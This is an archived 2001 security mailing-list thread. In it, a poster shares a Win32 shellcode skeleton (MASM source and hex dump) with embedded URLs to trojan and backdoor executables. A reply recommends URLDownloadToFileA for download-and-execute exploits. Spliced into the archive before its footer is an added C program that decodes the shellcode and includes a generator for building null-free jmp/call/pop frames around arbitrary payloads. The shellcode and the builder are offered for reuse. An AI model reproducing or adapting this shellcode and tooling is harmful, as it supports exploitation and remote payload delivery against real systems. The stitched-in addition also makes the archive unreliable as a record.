Haven't had time to check through your code yet, so you might already know this: to make everything even smaller there is a DLL called urlmon.dll which contains a function named URLDownloadToFileA. It does just what it says: downloads and saves a file from the web in one call. I used this in my first win32 exploit and it works perfectly.. :)

/andreas

"Enrique A. Compañ Gzz." wrote:
>
> This is an ultra early demo of the new shellcode I'm developing, designed to
> be fast & small & polymorphic, without hard-coded values.
>
> I have a previous version of a finished shellcode like this one, I'll
> release it soon...
>
> The Shell Code :
> -----------------------------
>
> This code was developed with masm32.
>
> This is only the base of the shellcode, it can be used to develop your own
> stuff.
>
> Features:
>
> * No need to know the address of our code, no need to have the address in a
>   register, no matter what technique you use to exploit the buffer (shellcode
>   in the buffer, shellcode after EIP, jump back... etc)
> * No Nulls
> * Fast & Small
>
> You can even compile this code and run the EXE and it will run and terminate
> normally... (nice ;-))
>
> .386                                    ; Next time we'll be using 586 code..... optimize!
>
> .model flat, stdcall
>
> include \masm32\include\windows.inc
> include \masm32\include\kernel32.inc
> includelib \masm32\lib\kernel32.lib
> include \masm32\include\user32.inc
> includelib \masm32\lib\user32.lib
>
> EXITPROCESS_ADDR EQU 077E8F32Dh         ; We'll get rid of this later ;-)
>
> .code
>
> shell_code_start:
>
>     jmp pi_offset                       ; Jump to call back function
>
> call_back:
>
>     pop esi                             ; ESI now points to the first variable (in this case "url");
>                                         ; no matter the size of the "real_code", ESI will always point there
> real_code_start:
>
>     xor eax, eax                        ; Our real code begins here...
>     push eax
>     mov eax, EXITPROCESS_ADDR
>     call eax                            ; Do nothing but call ExitProcess with a hard-coded value (just for testing)
>
> real_code_end:
>
> pi_offset:
>     call near ptr call_back             ; Return and push the address
>
> vars_start:
>
>     url db "http://box.org/trojen.exe", 0ffh   ; Just a var
>
> end shell_code_start
>
> 000001F4 0000 0000 0000 0000 0000 0000 EB0B 5E33 C050 B82D  ..............^3.P.-
> 00000208 F3E8 77FF D0E8 F0FF FFFF 6874 7470 3A2F 2F77 7777  ..w.......http://www
> 0000021C 2E76 6972 7465 6B77 6562 2E6E 6574 2F6E 6378 3939  .virtekweb.net/ncx99
> 00000230 2E65 7865 FF00                                      .exe..
>
> I've seen variations of this technique... but this one is just fine, it has
> the qualities of a good s-code.
>
> Oh yeah... I recommend using TASM32 or MASM32.
>
> BTW I'm collecting some references about this stuff you'll find very
> useful... I'll give them away soon.
>
> My stuff to come...
>
> Enrique A. Compañ Gzz.
> Virtek Labs
>
> Greets: RaiSe, Undersec Team, Net-Search E-Zine, the lists ;-) and all the
> rest...
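Added example, not code from the post: the jmp/call/pop frame above can be checked offline against the hex dump in the message. The C program below embeds the 54 bytes from offset 0x200 of that dump (which carries the www.virtekweb.net URL rather than the box.org one in the MASM source), decodes the short jmp and the rel32 call, and confirms that the return address the call pushes (what `pop esi` receives) is the first byte of the `url` variable. It then generalises the point "no matter the size of the real_code": `build_frame` assembles the same frame around an arbitrary body and variable block, recomputing both displacements, and reproduces the posted bytes exactly when given the post's 10-byte body. The null scan reports the trailing 0x00 of the dump, which follows the 0xFF terminator and is not emitted by the `url db` line. All function and variable names are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bytes copied from the hex dump in the post (offsets 0x200..0x235). */
static const uint8_t shellcode[] = {
    0xEB, 0x0B,                     /* jmp short pi_offset            */
    0x5E,                           /* call_back:  pop esi            */
    0x33, 0xC0,                     /* real_code:  xor eax, eax       */
    0x50,                           /*             push eax           */
    0xB8, 0x2D, 0xF3, 0xE8, 0x77,   /*             mov eax, 77E8F32Dh */
    0xFF, 0xD0,                     /*             call eax           */
    0xE8, 0xF0, 0xFF, 0xFF, 0xFF,   /* pi_offset:  call call_back     */
    'h','t','t','p',':','/','/','w','w','w','.','v','i','r','t','e','k',
    'w','e','b','.','n','e','t','/','n','c','x','9','9','.','e','x','e',
    0xFF,                           /* url terminator (0ffh)          */
    0x00                            /* present in the dump, not in the source */
};
static const size_t shellcode_len = sizeof shellcode;

/* Target of `EB rel8` at off, or -1 if there is no short jmp there. */
int jmp_short_target(const uint8_t *code, size_t len, size_t off)
{
    if (off + 2 > len || code[off] != 0xEB) return -1;
    return (int)(off + 2) + (int8_t)code[off + 1];
}

/* Target of `E8 rel32` at off, or -1 if there is no near call there. */
int call_rel32_target(const uint8_t *code, size_t len, size_t off)
{
    int32_t rel;
    if (off + 5 > len || code[off] != 0xE8) return -1;
    memcpy(&rel, code + off + 1, 4);          /* little-endian displacement */
    return (int)(off + 5) + rel;
}

/* Follow jmp -> call -> pop esi from byte 0 and return the offset the call
 * pushes (the first byte after it, i.e. the variables). -1 if no such pattern. */
int resolve_pop_esi(const uint8_t *code, size_t len)
{
    int call_off = jmp_short_target(code, len, 0);
    if (call_off < 0) return -1;
    int back = call_rel32_target(code, len, (size_t)call_off);
    if (back < 0 || (size_t)back >= len || code[back] != 0x5E) return -1;
    return call_off + 5;
}

/* Length of the variable at off up to its 0xFF terminator, -1 if none. */
int var_len(const uint8_t *code, size_t len, size_t off)
{
    for (size_t i = off; i < len; i++)
        if (code[i] == 0xFF) return (int)(i - off);
    return -1;
}

/* Offset of the first 0x00 byte, or -1 if the buffer is null-free. */
int first_null(const uint8_t *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00) return (int)i;
    return -1;
}

/* Generalisation: emit jmp short / pop esi / body / call back / vars for any
 * body, recomputing both displacements. Returns total length, or -1 if the
 * body does not fit in a short jmp (pop esi + body must be <= 127 bytes). */
int build_frame(const uint8_t *body, size_t body_len,
                const uint8_t *vars, size_t vars_len, uint8_t *out, size_t cap)
{
    size_t total = 2 + 1 + body_len + 5 + vars_len;
    if (body_len + 1 > 127 || total > cap) return -1;
    out[0] = 0xEB; out[1] = (uint8_t)(1 + body_len);   /* skip pop esi + body */
    out[2] = 0x5E;                                     /* pop esi             */
    memcpy(out + 3, body, body_len);
    out[3 + body_len] = 0xE8;                          /* call back to offset 2 */
    int32_t rel = -(int32_t)(body_len + 6);            /* 2 - (3+body_len+5)  */
    memcpy(out + 4 + body_len, &rel, 4);
    memcpy(out + 8 + body_len, vars, vars_len);
    return (int)total;
}

int main(void)
{
    int esi = resolve_pop_esi(shellcode, shellcode_len);
    if (esi < 0) { puts("jmp/call/pop pattern not found"); return 1; }
    int n = var_len(shellcode, shellcode_len, (size_t)esi);
    printf("pop esi -> offset %d, url = \"%.*s\" (%d bytes)\n",
           esi, n, (const char *)shellcode + esi, n);
    printf("first 0x00 byte at offset %d\n", first_null(shellcode, shellcode_len));
    return 0;
}
```

The 0xFF terminator is what lets the variable block stay free of 0x00 bytes; a decoder that copies the shellcode with a C-string routine would stop at the first null, so `first_null` is the check to run on any variant before using it.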
This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 14:33:04 PDT